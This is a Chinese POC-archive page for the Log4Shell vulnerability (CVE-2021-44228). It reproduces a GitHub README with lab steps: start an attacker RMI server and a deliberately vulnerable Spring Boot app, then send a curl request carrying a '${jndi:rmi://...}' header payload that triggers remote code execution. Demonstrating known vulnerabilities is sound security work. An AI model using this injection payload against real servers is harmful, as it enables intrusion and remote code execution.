POC详情: b3c9e3a34e13a44039569825a94dbd6812bb0439

来源
https://github.com/Labout/log4shell-rmi-poc
关联漏洞
标题: Apache Log4j 代码问题漏洞 (CVE-2021-44228)
描述:Apache Log4j是美国阿帕奇(Apache)基金会的一款基于Java的开源日志记录工具。 Apache Log4J 存在代码问题漏洞,攻击者可设计一个数据请求发送给使用 Apache Log4j工具的服务器,当该请求被打印成日志时就会触发远程代码执行。
描述
A Proof of Concept of the Log4j vulnerabilities (CVE-2021-44228) over Java-RMI
介绍
# log4shell-rmi-poc
A Proof of Concept of the Log4j vulnerability (CVE-2021-44228) over Java-RMI
<br/>
It uses Log4j 2.5.7 from spring-boot-starter-log4j2


## Requirements:

Tested with Java 8 (JDK 1.8.0_25) and Java 11 (JDK 11.0.1)

## How to run the POC

### 1. Clone the repo:
```bash
git clone https://github.com/Labout/log4shell-rmi-poc.git
```

### 2. Start the attacker RMI Server

```bash
cd Log4jshell_rmi_server

./mvnw clean package

java -jar target/Log4jshell.rmi.server-0.0.1-SNAPSHOT.jar
```

You should get something like this:

![rmi server](./rmi_server.png)


### 3. Start the vulnerable Log4j application (here a spring boot application)

In a new Terminal 

```bash
cd vulnerabel_log4j_app

./mvnw clean package

java -jar target/vulnerabel_log4j_app-0.0.1-SNAPSHOT.jar
```


### 4. Inject a vulnerable JNDI over the "Accept-version" header

```bash
curl 'http://localhost:8080/hello' --header 'Accept-Version: ${jndi:rmi://127.0.0.1:1099/ExecByEL}'
```

As you can see the the vulnerable app calls the Calculator app.

![exploit](./exploit.png)

## References 
https://www.cisecurity.org/log4j-zero-day-vulnerability-response/
<br>
https://www.lunasec.io/docs/blog/log4j-zero-day/
文件快照

 [4.0K]  /data/pocs/b3c9e3a34e13a44039569825a94dbd6812bb0439
├── [794K]  exploit.png
├── [4.0K]  Log4jshell_rmi_server
│   ├── [9.8K]  mvnw
│   ├── [6.5K]  mvnw.cmd
│   ├── [1.2K]  pom.xml
│   └── [4.0K]  src
│       └── [4.0K]  main
│           ├── [4.0K]  java
│           │   └── [4.0K]  com
│           │       └── [4.0K]  log4j
│           │           └── [4.0K]  exploit
│           │               └── [4.0K]  rmi
│           │                   └── [1.6K]  RmiServer.java
│           └── [4.0K]  resources
│               └── [   0]  application.properties
├── [1.2K]  README.md
├── [245K]  rmi_server.png
└── [4.0K]  vulnerabel_log4j_app
    ├── [4.0K]  logs
    │   └── [4.0K]  2021-12
    │       ├── [ 919]  spring-boot-logger-log4j2--18-December-2021-1.log.gz
    │       ├── [ 295]  spring-boot-logger-log4j2--18-December-2021-2.log.gz
    │       ├── [ 915]  spring-boot-logger-log4j2--18-December-2021-3.log.gz
    │       ├── [ 844]  spring-boot-logger-log4j2--18-December-2021-4.log.gz
    │       ├── [ 763]  spring-boot-logger-log4j2--18-December-2021-5.log.gz
    │       ├── [ 690]  spring-boot-logger-log4j2--18-December-2021-6.log.gz
    │       ├── [ 694]  spring-boot-logger-log4j2--18-December-2021-7.log.gz
    │       ├── [1.2K]  spring-boot-logger-log4j2--19-December-2021-1.log.gz
    │       ├── [1.6K]  spring-boot-logger-log4j2--19-December-2021-2.log.gz
    │       ├── [1.0K]  spring-boot-logger-log4j2--19-December-2021-3.log.gz
    │       └── [ 812]  spring-boot-logger-log4j2--19-December-2021-4.log.gz
    ├── [9.8K]  mvnw
    ├── [6.5K]  mvnw.cmd
    ├── [1.6K]  pom.xml
    └── [4.0K]  src
        ├── [4.0K]  main
        │   ├── [4.0K]  java
        │   │   └── [4.0K]  com
        │   │       └── [4.0K]  log4j
        │   │           └── [4.0K]  vulnerabel
        │   │               └── [4.0K]  app
        │   │                   ├── [ 633]  Log4jController.java
        │   │                   └── [ 410]  VulnerabelLog4jApplication.java
        │   └── [4.0K]  resources
        │       └── [   0]  application.properties
        └── [4.0K]  test
            └── [4.0K]  java
                └── [4.0K]  com
                    └── [4.0K]  log4j
                        └── [4.0K]  vulnerabel
                            └── [4.0K]  app
                                └── [ 225]  VulnerabelLog4JApplicationTests.java

26 directories, 26 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。